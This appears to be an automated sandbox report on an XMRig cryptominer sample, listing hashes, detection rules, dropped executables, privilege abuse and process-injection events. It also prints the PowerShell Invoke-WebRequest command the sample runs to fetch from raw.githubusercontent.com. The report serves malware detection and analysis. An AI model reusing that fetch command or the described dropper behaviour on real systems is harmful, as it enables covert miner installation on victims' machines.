xmrig | 28549655067aac3c537e6bf623d61fc0662c40374614895862a581c3f1e243aa

Analysis

max time kernel
40s
max time network
36s
platform
windows10-2004_x64
resource
win10v2004-20240419-en
resource tags

arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
submitted
30/04/2024, 13:05

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
Size

2.1MB
MD5

09d43c3de68ba9783ea0e9dbfe08fe78
SHA1

bb6d7f245b0125a9df628f938849858a516373a4
SHA256

28549655067aac3c537e6bf623d61fc0662c40374614895862a581c3f1e243aa
SHA512

5c6c2b13b6a06f01f31675ef19f9705fd2c8a761db4863c342360eed4848fbd5945b11894eb09a357342ab86d99eadedb37394e2f9325d41ef46692a41b268c4
SSDEEP

49152:Lz071uv4BPMkibTIA5sf6r+WVc2HhG82g1VQx7Va4qre:NABp

Score

10^/10

xmrig miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 20 IoCs

miner

resource	yara_rule
behavioral2/memory/4312-39-0x00007FF6D42F0000-0x00007FF6D46E2000-memory.dmp	xmrig
behavioral2/memory/4916-55-0x00007FF68C9D0000-0x00007FF68CDC2000-memory.dmp	xmrig
behavioral2/memory/2240-491-0x00007FF676F70000-0x00007FF677362000-memory.dmp	xmrig
behavioral2/memory/4980-492-0x00007FF7365C0000-0x00007FF7369B2000-memory.dmp	xmrig
behavioral2/memory/464-493-0x00007FF7B8630000-0x00007FF7B8A22000-memory.dmp	xmrig
behavioral2/memory/1532-494-0x00007FF6FC070000-0x00007FF6FC462000-memory.dmp	xmrig
behavioral2/memory/2260-495-0x00007FF63B5C0000-0x00007FF63B9B2000-memory.dmp	xmrig
behavioral2/memory/944-496-0x00007FF707720000-0x00007FF707B12000-memory.dmp	xmrig
behavioral2/memory/1248-497-0x00007FF711310000-0x00007FF711702000-memory.dmp	xmrig
behavioral2/memory/2436-498-0x00007FF66B640000-0x00007FF66BA32000-memory.dmp	xmrig
behavioral2/memory/1448-499-0x00007FF753410000-0x00007FF753802000-memory.dmp	xmrig
behavioral2/memory/3432-500-0x00007FF7FACF0000-0x00007FF7FB0E2000-memory.dmp	xmrig
behavioral2/memory/3508-502-0x00007FF7686C0000-0x00007FF768AB2000-memory.dmp	xmrig
behavioral2/memory/216-505-0x00007FF7DDFB0000-0x00007FF7DE3A2000-memory.dmp	xmrig
behavioral2/memory/1088-504-0x00007FF687C30000-0x00007FF688022000-memory.dmp	xmrig
behavioral2/memory/2080-517-0x00007FF70E8A0000-0x00007FF70EC92000-memory.dmp	xmrig
behavioral2/memory/4692-521-0x00007FF7D54D0000-0x00007FF7D58C2000-memory.dmp	xmrig
behavioral2/memory/740-509-0x00007FF7DF930000-0x00007FF7DFD22000-memory.dmp	xmrig
behavioral2/memory/1480-503-0x00007FF7983B0000-0x00007FF7987A2000-memory.dmp	xmrig
behavioral2/memory/2528-501-0x00007FF768030000-0x00007FF768422000-memory.dmp	xmrig

Blocklisted process makes network request 6 IoCs

flow	pid	Process
8	4504	powershell.exe
10	4504	powershell.exe
15	4504	powershell.exe
16	4504	powershell.exe
18	4504	powershell.exe
20	4504	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
3124	wVlRZeb.exe
740	OcnXDfK.exe
4312	qruPDtF.exe
4916	vKceuyz.exe
2240	qJTRGOw.exe
2080	cxvrqft.exe
4692	UqCIIhV.exe
4980	YWZSseP.exe
464	jRgKTKD.exe
1532	ctMvzZA.exe
2260	PXjimPb.exe
944	zXgxoZK.exe
1248	MZziguc.exe
2436	nKMhfuT.exe
1448	IwSARGf.exe
3432	UEYXjJV.exe
2528	vOLBJvk.exe
3508	eiTDWus.exe
1480	tctuttf.exe
1088	kUsjNqo.exe
216	MsqATzh.exe
3460	sBFjpWr.exe
4468	SwzYUNE.exe
436	VLrkDYv.exe
4348	XELfnhY.exe
3216	wsiEFnZ.exe
2580	zCYhzBZ.exe
3208	VGdwRpZ.exe
3724	CwaZGWL.exe
4512	VbnvGyp.exe
1212	BvXaSzA.exe
2340	QlMhGJV.exe
2600	tMbfmHv.exe
2396	JznFPFm.exe
2424	YusDcEs.exe
848	POAgBWV.exe
3300	FBbaQyt.exe
4052	qNOnIdI.exe
4656	wqItKLa.exe
4412	caChRAB.exe
4612	shGmOll.exe
2236	QllVXiJ.exe
4624	kdyfOEj.exe
3892	AdPyGhB.exe
1524	bEseIPe.exe
5024	XirDEMs.exe
8	uLVaePw.exe
1608	JVHdXyl.exe
1852	XIRwUAt.exe
1428	LRWuwps.exe
3188	RgQznyr.exe
2672	gcMuDEj.exe
1960	mIAYWcE.exe
840	SAUQEcB.exe
4320	IIDWtAg.exe
4456	zQQQgjc.exe
4860	QBsPjqC.exe
4744	CrnxIkH.exe
4112	efMUPWi.exe
2152	WybgBsM.exe
3744	eXcgCYR.exe
1068	SGtuGBx.exe
2636	qdxxJst.exe
2680	nKJWfjG.exe

UPX packed file 55 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3020-0-0x00007FF6E2810000-0x00007FF6E2C02000-memory.dmp	upx
behavioral2/files/0x000b000000023ba8-5.dat	upx
behavioral2/files/0x000a000000023baa-9.dat	upx
behavioral2/files/0x000a000000023bab-19.dat	upx
behavioral2/memory/4312-39-0x00007FF6D42F0000-0x00007FF6D46E2000-memory.dmp	upx
behavioral2/memory/4916-55-0x00007FF68C9D0000-0x00007FF68CDC2000-memory.dmp	upx
behavioral2/files/0x000a000000023bad-60.dat	upx
behavioral2/files/0x000b000000023bb0-62.dat	upx
behavioral2/files/0x000a000000023bb1-53.dat	upx
behavioral2/files/0x000a000000023bb2-66.dat	upx
behavioral2/files/0x000a000000023bb7-96.dat	upx
behavioral2/files/0x000a000000023bb8-105.dat	upx
behavioral2/files/0x000a000000023bba-117.dat	upx
behavioral2/files/0x000a000000023bbc-127.dat	upx
behavioral2/files/0x000a000000023bbe-137.dat	upx
behavioral2/files/0x000a000000023bc3-162.dat	upx
behavioral2/files/0x000a000000023bc7-174.dat	upx
behavioral2/files/0x000a000000023bc8-179.dat	upx
behavioral2/files/0x000a000000023bc6-177.dat	upx
behavioral2/files/0x000a000000023bc5-172.dat	upx
behavioral2/files/0x000a000000023bc4-167.dat	upx
behavioral2/files/0x000a000000023bc2-157.dat	upx
behavioral2/files/0x000a000000023bc1-152.dat	upx
behavioral2/files/0x000a000000023bc0-147.dat	upx
behavioral2/files/0x000a000000023bbf-142.dat	upx
behavioral2/files/0x000a000000023bbd-132.dat	upx
behavioral2/files/0x000a000000023bbb-122.dat	upx
behavioral2/files/0x000a000000023bb9-112.dat	upx
behavioral2/files/0x0031000000023bb6-94.dat	upx
behavioral2/files/0x0031000000023bb5-90.dat	upx
behavioral2/files/0x0031000000023bb4-85.dat	upx
behavioral2/files/0x000a000000023bb3-80.dat	upx
behavioral2/files/0x000b000000023baf-75.dat	upx
behavioral2/files/0x000a000000023bae-52.dat	upx
behavioral2/files/0x000a000000023bac-48.dat	upx
behavioral2/files/0x000a000000023ba9-20.dat	upx
behavioral2/memory/3124-12-0x00007FF7E1370000-0x00007FF7E1762000-memory.dmp	upx
behavioral2/memory/2240-491-0x00007FF676F70000-0x00007FF677362000-memory.dmp	upx
behavioral2/memory/4980-492-0x00007FF7365C0000-0x00007FF7369B2000-memory.dmp	upx
behavioral2/memory/464-493-0x00007FF7B8630000-0x00007FF7B8A22000-memory.dmp	upx
behavioral2/memory/1532-494-0x00007FF6FC070000-0x00007FF6FC462000-memory.dmp	upx
behavioral2/memory/2260-495-0x00007FF63B5C0000-0x00007FF63B9B2000-memory.dmp	upx
behavioral2/memory/944-496-0x00007FF707720000-0x00007FF707B12000-memory.dmp	upx
behavioral2/memory/1248-497-0x00007FF711310000-0x00007FF711702000-memory.dmp	upx
behavioral2/memory/2436-498-0x00007FF66B640000-0x00007FF66BA32000-memory.dmp	upx
behavioral2/memory/1448-499-0x00007FF753410000-0x00007FF753802000-memory.dmp	upx
behavioral2/memory/3432-500-0x00007FF7FACF0000-0x00007FF7FB0E2000-memory.dmp	upx
behavioral2/memory/3508-502-0x00007FF7686C0000-0x00007FF768AB2000-memory.dmp	upx
behavioral2/memory/216-505-0x00007FF7DDFB0000-0x00007FF7DE3A2000-memory.dmp	upx
behavioral2/memory/1088-504-0x00007FF687C30000-0x00007FF688022000-memory.dmp	upx
behavioral2/memory/2080-517-0x00007FF70E8A0000-0x00007FF70EC92000-memory.dmp	upx
behavioral2/memory/4692-521-0x00007FF7D54D0000-0x00007FF7D58C2000-memory.dmp	upx
behavioral2/memory/740-509-0x00007FF7DF930000-0x00007FF7DFD22000-memory.dmp	upx
behavioral2/memory/1480-503-0x00007FF7983B0000-0x00007FF7987A2000-memory.dmp	upx
behavioral2/memory/2528-501-0x00007FF768030000-0x00007FF768422000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
6	raw.githubusercontent.com
8	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\poPVgHj.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\IvRgIdA.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\lyRIaZW.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\HDDMTya.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\zUYzcnp.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\tMbfmHv.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\VvKpaDz.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\grPySKr.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\bdgVpFb.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\ecmciSN.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\XELfnhY.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\UiBGviv.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\ftWErCO.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\DLbRwnc.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\DHgqkgE.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\AuLZvON.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\SbLmccn.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\ygHcabu.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\pdxKhZN.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\tEsGnDU.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\OSOqbgm.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\HRkzbHi.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\uqWQbOm.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\qaDyOHw.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\RxdUxBb.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\HGizstB.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\oLAgxqa.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\kELPMrH.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\qClHxWe.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\Nykebap.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\LGCfTZk.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\LffNwOe.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\BcniSmu.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\sUYXIMJ.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\jcJsNcK.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\jrGDKLC.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\EDfcdmF.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\UAVagLL.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\ZtvoEqI.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\oqvalEm.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\fhcCHJL.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\UhyHfpo.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\BuPkFPm.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\DXOKxSs.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\dYEvNRc.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\gmDysIc.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\oZPmGtP.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\fLafLdQ.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\oBECGeP.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\enUQaFi.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\DLpgfxe.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\YHyYjUu.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\oLfxDCc.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\QgONXCC.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\fFraTYm.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\eZVcpnM.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\AmtqzOj.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\iYoSYko.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\qJTRGOw.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\eGedKau.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\RtprdZW.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\ojoHCtr.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\NjIFxeZ.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
File created	C:\Windows\System\GccNhCu.exe	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4504	powershell.exe
4504	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4504	powershell.exe
Token: SeLockMemoryPrivilege	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
Token: SeLockMemoryPrivilege	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3020 wrote to memory of 4504	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	86
PID 3020 wrote to memory of 4504	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	86
PID 3020 wrote to memory of 3124	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	87
PID 3020 wrote to memory of 3124	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	87
PID 3020 wrote to memory of 740	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	88
PID 3020 wrote to memory of 740	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	88
PID 3020 wrote to memory of 4312	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	89
PID 3020 wrote to memory of 4312	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	89
PID 3020 wrote to memory of 4916	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	90
PID 3020 wrote to memory of 4916	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	90
PID 3020 wrote to memory of 2240	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	91
PID 3020 wrote to memory of 2240	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	91
PID 3020 wrote to memory of 2080	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	92
PID 3020 wrote to memory of 2080	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	92
PID 3020 wrote to memory of 4692	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	93
PID 3020 wrote to memory of 4692	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	93
PID 3020 wrote to memory of 4980	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	94
PID 3020 wrote to memory of 4980	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	94
PID 3020 wrote to memory of 464	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	95
PID 3020 wrote to memory of 464	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	95
PID 3020 wrote to memory of 1532	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	96
PID 3020 wrote to memory of 1532	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	96
PID 3020 wrote to memory of 2260	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	97
PID 3020 wrote to memory of 2260	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	97
PID 3020 wrote to memory of 944	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	98
PID 3020 wrote to memory of 944	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	98
PID 3020 wrote to memory of 1248	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	99
PID 3020 wrote to memory of 1248	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	99
PID 3020 wrote to memory of 2436	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	100
PID 3020 wrote to memory of 2436	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	100
PID 3020 wrote to memory of 1448	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	101
PID 3020 wrote to memory of 1448	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	101
PID 3020 wrote to memory of 3432	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	102
PID 3020 wrote to memory of 3432	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	102
PID 3020 wrote to memory of 2528	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	103
PID 3020 wrote to memory of 2528	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	103
PID 3020 wrote to memory of 3508	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	104
PID 3020 wrote to memory of 3508	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	104
PID 3020 wrote to memory of 1480	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	105
PID 3020 wrote to memory of 1480	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	105
PID 3020 wrote to memory of 1088	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	106
PID 3020 wrote to memory of 1088	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	106
PID 3020 wrote to memory of 216	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	107
PID 3020 wrote to memory of 216	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	107
PID 3020 wrote to memory of 3460	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	108
PID 3020 wrote to memory of 3460	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	108
PID 3020 wrote to memory of 4468	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	109
PID 3020 wrote to memory of 4468	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	109
PID 3020 wrote to memory of 436	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	110
PID 3020 wrote to memory of 436	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	110
PID 3020 wrote to memory of 4348	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	111
PID 3020 wrote to memory of 4348	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	111
PID 3020 wrote to memory of 3216	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	112
PID 3020 wrote to memory of 3216	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	112
PID 3020 wrote to memory of 2580	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	113
PID 3020 wrote to memory of 2580	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	113
PID 3020 wrote to memory of 3208	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	114
PID 3020 wrote to memory of 3208	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	114
PID 3020 wrote to memory of 3724	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	115
PID 3020 wrote to memory of 3724	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	115
PID 3020 wrote to memory of 4512	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	116
PID 3020 wrote to memory of 4512	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	116
PID 3020 wrote to memory of 1212	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	117
PID 3020 wrote to memory of 1212	3020	09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe	117

C:\Users\Admin\AppData\Local\Temp\09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\09d43c3de68ba9783ea0e9dbfe08fe78_JaffaCakes118.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3020
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4504
- C:\Windows\System\wVlRZeb.exe
  C:\Windows\System\wVlRZeb.exe
  2⤵
  - Executes dropped EXE
  PID:3124
- C:\Windows\System\OcnXDfK.exe
  C:\Windows\System\OcnXDfK.exe
  2⤵
  - Executes dropped EXE
  PID:740
- C:\Windows\System\qruPDtF.exe
  C:\Windows\System\qruPDtF.exe
  2⤵
  - Executes dropped EXE
  PID:4312
- C:\Windows\System\vKceuyz.exe
  C:\Windows\System\vKceuyz.exe
  2⤵
  - Executes dropped EXE
  PID:4916
- C:\Windows\System\qJTRGOw.exe
  C:\Windows\System\qJTRGOw.exe
  2⤵
  - Executes dropped EXE
  PID:2240
- C:\Windows\System\cxvrqft.exe
  C:\Windows\System\cxvrqft.exe
  2⤵
  - Executes dropped EXE
  PID:2080
- C:\Windows\System\UqCIIhV.exe
  C:\Windows\System\UqCIIhV.exe
  2⤵
  - Executes dropped EXE
  PID:4692
- C:\Windows\System\YWZSseP.exe
  C:\Windows\System\YWZSseP.exe
  2⤵
  - Executes dropped EXE
  PID:4980
- C:\Windows\System\jRgKTKD.exe
  C:\Windows\System\jRgKTKD.exe
  2⤵
  - Executes dropped EXE
  PID:464
- C:\Windows\System\ctMvzZA.exe
  C:\Windows\System\ctMvzZA.exe
  2⤵
  - Executes dropped EXE
  PID:1532
- C:\Windows\System\PXjimPb.exe
  C:\Windows\System\PXjimPb.exe
  2⤵
  - Executes dropped EXE
  PID:2260
- C:\Windows\System\zXgxoZK.exe
  C:\Windows\System\zXgxoZK.exe
  2⤵
  - Executes dropped EXE
  PID:944
- C:\Windows\System\MZziguc.exe
  C:\Windows\System\MZziguc.exe
  2⤵
  - Executes dropped EXE
  PID:1248
- C:\Windows\System\nKMhfuT.exe
  C:\Windows\System\nKMhfuT.exe
  2⤵
  - Executes dropped EXE
  PID:2436
- C:\Windows\System\IwSARGf.exe
  C:\Windows\System\IwSARGf.exe
  2⤵
  - Executes dropped EXE
  PID:1448
- C:\Windows\System\UEYXjJV.exe
  C:\Windows\System\UEYXjJV.exe
  2⤵
  - Executes dropped EXE
  PID:3432
- C:\Windows\System\vOLBJvk.exe
  C:\Windows\System\vOLBJvk.exe
  2⤵
  - Executes dropped EXE
  PID:2528
- C:\Windows\System\eiTDWus.exe
  C:\Windows\System\eiTDWus.exe
  2⤵
  - Executes dropped EXE
  PID:3508
- C:\Windows\System\tctuttf.exe
  C:\Windows\System\tctuttf.exe
  2⤵
  - Executes dropped EXE
  PID:1480
- C:\Windows\System\kUsjNqo.exe
  C:\Windows\System\kUsjNqo.exe
  2⤵
  - Executes dropped EXE
  PID:1088
- C:\Windows\System\MsqATzh.exe
  C:\Windows\System\MsqATzh.exe
  2⤵
  - Executes dropped EXE
  PID:216
- C:\Windows\System\sBFjpWr.exe
  C:\Windows\System\sBFjpWr.exe
  2⤵
  - Executes dropped EXE
  PID:3460
- C:\Windows\System\SwzYUNE.exe
  C:\Windows\System\SwzYUNE.exe
  2⤵
  - Executes dropped EXE
  PID:4468
- C:\Windows\System\VLrkDYv.exe
  C:\Windows\System\VLrkDYv.exe
  2⤵
  - Executes dropped EXE
  PID:436
- C:\Windows\System\XELfnhY.exe
  C:\Windows\System\XELfnhY.exe
  2⤵
  - Executes dropped EXE
  PID:4348
- C:\Windows\System\wsiEFnZ.exe
  C:\Windows\System\wsiEFnZ.exe
  2⤵
  - Executes dropped EXE
  PID:3216
- C:\Windows\System\zCYhzBZ.exe
  C:\Windows\System\zCYhzBZ.exe
  2⤵
  - Executes dropped EXE
  PID:2580
- C:\Windows\System\VGdwRpZ.exe
  C:\Windows\System\VGdwRpZ.exe
  2⤵
  - Executes dropped EXE
  PID:3208
- C:\Windows\System\CwaZGWL.exe
  C:\Windows\System\CwaZGWL.exe
  2⤵
  - Executes dropped EXE
  PID:3724
- C:\Windows\System\VbnvGyp.exe
  C:\Windows\System\VbnvGyp.exe
  2⤵
  - Executes dropped EXE
  PID:4512
- C:\Windows\System\BvXaSzA.exe
  C:\Windows\System\BvXaSzA.exe
  2⤵
  - Executes dropped EXE
  PID:1212
- C:\Windows\System\QlMhGJV.exe
  C:\Windows\System\QlMhGJV.exe
  2⤵
  - Executes dropped EXE
  PID:2340
- C:\Windows\System\tMbfmHv.exe
  C:\Windows\System\tMbfmHv.exe
  2⤵
  - Executes dropped EXE
